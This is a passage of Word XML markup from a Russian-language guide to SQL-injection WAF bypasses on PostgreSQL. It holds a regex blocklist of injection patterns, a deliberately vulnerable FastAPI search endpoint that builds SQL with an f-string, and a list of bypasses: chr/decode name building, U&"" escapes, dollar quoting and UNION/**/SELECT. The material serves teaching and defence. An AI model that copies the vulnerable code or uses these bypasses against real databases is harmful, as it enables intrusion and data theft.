        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"'\s*;", re.IGNORECASE),                 # завершение литерала + stacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B5A7DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"--|/\*", re.IGNORECASE),                # SQL-комментарии любого вида</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF5C020" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bDROP|TRUNCATE|GRANT|CREATE|ALTER\b", re.IGNORECASE),  # DDL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D84267" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\b(dblink|pg_read|pg_authid|pg_shadow|pg_sleep)\w*",    # опасные функции/каталоги</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7778146C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">               re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B47D7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"OR\s+1\s*=\s*1", re.IGNORECASE),        # классическая тавтология</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3E901B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B2D09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B61DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395A8CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def waf_sanitize(value: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F78F087" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    for pat in BLOCKED_PATTERNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB025C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if pat.search(value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A67971" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            raise HTTPException(status_code=400, detail="forbidden pattern")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328DD3C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0601FFBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BCC0F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05438C44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B68B997" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA481C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113009E"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510B5AA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA1ADC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = waf_sanitize(q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4494B34A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"SELECT id, title, body FROM articles WHERE title = '{q}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AEEB5D"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2C87FB38"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7BD622A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Этот фильтр пропускает breakout-кавычку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (без неё атака на string-context невозможна, но и легитимные имена с апострофами сломаются), но блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>дальнейшее</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> опасное использование. Что 3.9.1–3.9.7 обходят:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376BE8C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Любая функция/каталог из чёрного списка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) → 3.9.2/3.9.5 (собрать имя функции из chr/decode-байтов так, чтобы в payload-тексте </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">подстроки не было), 3.9.3 (Unicode-escape для имён в идентификаторах через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD2BED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`'OR`/`'AND` паттерн</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 3.9.1 (если payload включает свой строковый литерал — пишется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$...$$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не активирует подсчёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), 3.9.6 (whitespace: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'\tOR </w:t>
      </w:r>
      <w:r>
        <w:t>, Unicode space, или альтернативные тавтологии без OR).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771AE794" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`UNION SELECT`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 3.9.6 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION/**/SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, регистр-вариации) или 3.9.3 (literal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'UNION'</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'SELECT'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через codepoint-ы вместо keyword-ов в случаях, когда они идут как значение, а не как ключевое слово).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3319B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   **</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> комментарии** → 3.9.6 (вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* */</w:t>
      </w:r>
      <w:r>
        <w:t>? нет, тоже блочится; альтернатива: завершить payload синтаксически валидной квотой и без комментария).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E728C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DDL ключевые слова</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t>) — 3.9.6 (whitespace, регистр), но в большинстве случаев DDL не нужен в read-only injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2D425F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Главный практический урок: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF блокирует синтаксис того, что атакующий пишет</w:t>
      </w:r>
      <w:r>
        <w:t>; 3.9 переписывает payload в семантически эквивалентную форму с другим синтаксисом, который фильтр пропускает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C58045C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Стандартная структура подразделов 3.9.1–3.9.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC330F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Каждая карточка строится по сжатой схеме:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642FA708" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что блокирует фильтр</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конкретный регекс/правило, против которого работает приём</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327BCEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — какой payload идёт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (со ссылкой на 3.9.0 как уязвимый код), результирующий SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76874322" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — после построения строки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E275F4B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077FA87A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — со ссылкой на конкретный раздел лексики PG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476EF6D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>связанные</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07003129" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A94F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (stacked queries) vs 3.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.9.6 включает whitespace tricks с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>; если в payload вообще нужны несколько команд, это уже 3.5 + 3.9.6 как обходка. 3.9.6 чисто про обход символьного фильтра, не про мульти-команды.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE17B81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12 (comments) vs 3.9.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как whitespace и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
